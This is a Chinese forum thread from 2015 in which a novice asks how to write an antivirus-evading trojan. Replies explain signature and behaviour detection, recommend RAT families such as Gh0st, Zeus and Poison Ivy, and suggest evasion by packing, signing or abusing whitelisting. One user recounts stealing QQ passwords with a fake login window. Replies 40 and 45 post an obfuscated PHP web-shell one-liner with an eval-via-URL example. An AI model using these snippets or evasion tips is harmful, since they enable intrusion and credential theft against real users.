表示从来没有用过木马,也不知道木马长什么样子
电脑木马是用来偷按键,截屏,还可以偷文件么?
想写个木马,这里有人写过么,指点下本菜鸟吧:)
如何写免杀木马呢?可以被国内外所有杀软免杀,做到这点很难么?
1
bugeye 2015-04-19 10:21:37 +08:00
刚写出来的木马就是免杀的。
|
3
br00k 2015-04-19 10:24:57 +08:00
灰鸽子
|
6
kiritoalex 2015-04-19 10:37:36 +08:00
现在杀软有动态分析机制,另外Norton之流有信誉分析云,一般过不了
|
7
hx1997 2015-04-19 10:38:38 +08:00
@eeeeeeve 刚写出来特征库里没有,自然就不会被特征码扫描检测出来(除非你写的和某个前人的太像了)。但杀软还可以通过沙盒、二进制翻译什么的技术模拟程序行为,看看是不是木马。
|
8
xiaoyaoking 2015-04-19 10:43:53 +08:00 via Android
现在都是检测软件行为,目前免杀是数字签名白名单。
|
9
licheeve 2015-04-19 10:55:36 +08:00
记得上学时用VB写了一个读取窗体内文本框的内容的程序. 参考的是盗qq号的教程. 结果被杀毒软件报说是行为不轨.
|
11
xenme 2015-04-19 11:13:35 +08:00
现在基本都是判断行为的:
只要不在白名单的软件,只要hook键盘输入,增加HBO监控或者修改主页,注入其他进程等等这些行为都被判断为异常行为或者木马。 |
12
Septembers 2015-04-19 11:37:00 +08:00 via Android
经典的Gh0st 可以了解下
|
13
acpp 2015-04-19 11:38:57 +08:00
看了楼主问题的问题,楼主1没用过木马 2不知道怎么做免杀,基本上,没有实现目的的可能了
|
14
xenme 2015-04-19 11:43:04 +08:00 4
其实QQ,360这些能收集各种资料和个人信息的就是木马
但是还不会被杀毒软件干掉,能继续收集,这就是免杀。 |
15
KexyBiscuit 2015-04-19 11:43:50 +08:00 via Android 1
我上学写的VB6练习也会被360杀。
我觉得360查杀引擎应该是随机数发生器(弥天大雾) |
16
loading 2015-04-19 11:46:12 +08:00 via iPhone
hips 类的杀软,行为判断的。
这个不好过。 |
17
em70 2015-04-19 12:23:00 +08:00 via Android 1
多年前,自己用VB做了一个QQ登录界面,可以以假乱真的,输入账号密码后自动保存再提示密码错误,然后启动本机真正的QQ。放学校机房,偷了几个QQ密码
|
18
wohenyingyu01 2015-04-19 12:27:20 +08:00
@em70 同事开发了一个安卓桌面,自动复制原来的桌面截图做背景并使其表面上看不出来,劫持桌面上的所有图标。。。
|
19
nogoodren 2015-04-19 12:53:02 +08:00
有不少木马开放了源代码 下载来看看就可以了
|
20
vvqqdd 2015-04-19 13:43:58 +08:00
Gh0st的远控不错
以前还玩过pcshare之类 以前加壳加花加个签名就过一大堆杀软了,现在不会玩了。 |
21
Daddy 2015-04-19 13:56:05 +08:00
木马就是正宗的setup安装程序软件。
但别人都不愿意下载你的木马安装你的木马,所以你得想办法骗人下载,并偷偷安装上。 其实你可以卸载对方的杀软,然后替换成一个虚假的杀软的…… 功能?让你能admin登陆别人的系统,你能做什么,木马同样也能做什么,截取当前屏幕、键盘鼠标动作,知道对方在干什么;浏览电脑目录,知道对方是什么人并上传下载你喜欢的文档;执行对方电脑的软件等。 |
22
Owenjia 2015-04-19 14:36:31 +08:00 via Android
之前帮一妹子用 python 写了个简单的爬虫,发过去之后得到了“360 说你发的是木马”的回复,这算不算?
|
23
domino 2015-04-19 15:51:45 +08:00
丢到沙盘,直接样本分析.
|
24
sobigfish 2015-04-19 15:55:32 +08:00
阿*的控件监控键盘 网络 也是木马
-- 人家的木马不被杀才是攻心为上 |
25
gamexg 2015-04-19 16:09:21 +08:00
做个正常操作就会注入其他程序、hook键盘的软件例如游戏修改器,通过特殊方式启动就会变成木马。
然后去找各个杀软要白名单就免杀了。 |
26
gamexg 2015-04-19 16:11:19 +08:00
或者直接做个正规的远程管理软件,同样找各个杀毒软件要白名单。
自己在反汇编做个无提示版的就ok |
27
ninqq 2015-04-19 16:18:57 +08:00
自己写个杀毒软件 然后推广成功就可以了
|
28
shuangchun 2015-04-19 16:25:25 +08:00
一般初中生小学生都会写过,因为这是那个年纪最酷的事
|
29
tencoldays 2015-04-19 16:52:04 +08:00
还以为要“木马”乐队...
|
30
xiewei20082008 2015-04-19 17:18:27 +08:00
@gamexg 入白名单实际上算社工的方式了,而实际上,杀软对社工确实没有太好的办法~
|
34
yuhu 2015-04-19 18:36:10 +08:00
写过,但是不具备有传播的功能,算是一种隐藏的文件管理软件吧。囧哈哈。
|
35
sunocean 2015-04-19 19:58:16 +08:00 via Android
@xiewei20082008 一句话总结,在牛逼的软件都挡不住用户犯傻
|
36
ooh 2015-04-19 20:01:32 +08:00
你都不知道这个东西是什么,换句话说你都不知道自己要做什么,这样是不是有点漫无目的呢...
|
39
Tink 2015-04-19 21:24:29 +08:00
好早以前看过免杀,也就是改改特征码啥的,那时候杀毒软件都是靠特征码判断的
|
40
evilddog 2015-04-19 21:44:02 +08:00 1
```PHP
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?> ``` 这种算不算 |
42
fork3rt 2015-04-20 09:21:27 +08:00
以前做过免杀, 好多年前了。有源代码免杀和汇编免杀。。 可以通过multccl来进行特征码定位。。
|
43
xiaoxiaoleo 2015-04-20 10:47:46 +08:00
去看雪问问~
|
45
pany 2015-04-20 15:23:58 +08:00
@evilddog
这个其实不算。只有在Register Globals为ON的情况下 url.com/test.php?_=assert&__=eval($_POST[hi]) 才能使用 Register Globals已自 PHP 5.3.0 起废弃并将自 PHP 5.4.0 起移除。 完整的是 <?php $_=""; $_[+""]=''; $_="$_".""; $_=($_[+""]|" ").($_[+""]|"").($_[+""]^" "); ?> <?php ${'_'.$_}['_'](${'_'.$_}['__']);?> |
46
hydrazt 2015-04-20 21:07:58 +08:00
直接下载Zeus的源代码吧,你说的都支持了
不过之前泄漏出来的代码是32位的,64位系统上只能以单进程跑。 需要修改了一下代码,才能让64位系统也能注入dll和注入进程。 |
47
hydrazt 2015-04-20 21:09:12 +08:00
自己编译的zeus免杀的,用金山杀不出来。。
|
48
doublleft 2015-04-27 18:15:37 +08:00
gh0st rat 3.5 很经典的开源远控,后期有不少作品都是基于gh0st制作的
还有一个牛逼的,Poison Ivy,生成 shellcode 自己封成PE |